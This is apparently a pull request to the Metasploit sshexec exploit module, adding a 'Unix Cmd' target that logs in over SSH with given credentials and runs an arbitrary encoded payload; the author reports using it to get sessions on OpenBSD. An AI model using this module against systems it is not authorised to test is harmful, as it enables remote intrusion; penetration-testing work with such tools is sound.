### PR TITLE
Update sshexec to allow unix cmd for testing and other targets not supported

### DIFF
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars'     => "",
           'DisableNops'  => true
         },
-      'Platform'         => %w[linux osx python],
+      'Platform'         => %w[linux osx unix python],
       'CmdStagerFlavor'  => %w[bourne echo printf wget],
       'Targets'          =>
         [
@@ -108,6 +108,13 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Arch'     => ARCH_PYTHON,
               'Platform' => 'python'
+            }
+          ],
+          [
+            'Unix Cmd',
+            {
+              'Arch'     => ARCH_CMD,
+              'Platform' => 'unix'
             }
           ]
         ],
@@ -186,8 +193,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
+
     if target['Platform'] == 'python'
       execute_command("python -c \"#{payload.encoded}\"")
+    elsif target['Platform'] == 'unix'
+      execute_command(payload.encoded)
     else
       execute_cmdstager(linemax: 500)
     end


### PR DESCRIPTION
Set target to unix cmd,, add options for ssh sessions, select a payload and go.  

I used this modified version many times to get a quick session on OpenBSD which was not supported by the default targets.

